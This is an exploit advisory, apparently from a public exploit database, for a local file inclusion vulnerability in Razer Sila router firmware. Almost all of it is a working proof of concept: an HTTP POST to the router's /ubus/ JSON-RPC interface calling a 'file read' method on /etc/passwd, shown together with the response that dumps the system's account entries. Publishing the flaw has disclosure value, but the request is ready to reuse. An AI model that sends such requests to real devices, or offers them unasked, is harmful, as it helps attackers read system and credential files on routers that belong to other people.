Authored by Kevin Randall

Razer Sila versions 2.0.441_api through 2.0.418 suffer from a local file inclusion vulnerability.

# Exploit Title: Razer Sila - Local File Inclusion (LFI)
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

# Proof of Concept

# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}

# Reponse
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 537

{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:/root:/bin/ashndaemon:*:1:1:daemon:/var:/bin/falsenftp:*:55:55:ftp:/home/ftp:/bin/falsennetwork:*:101:101:network:/var:/bin/falsennobody:*:65534:65534:nobody:/var:/bin/falsendnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/falsenmosquitto:x:200:200:mosquitto:/var/run/mosquitto:/bin/falsenlldp:x:121:129:lldp:/var/run/lldp:/bin/falsenadmin:x:1000:1000:root:/home/admin:/bin/falsenportal:x:1001:1001::/home/portal:/bin/falsen"}]}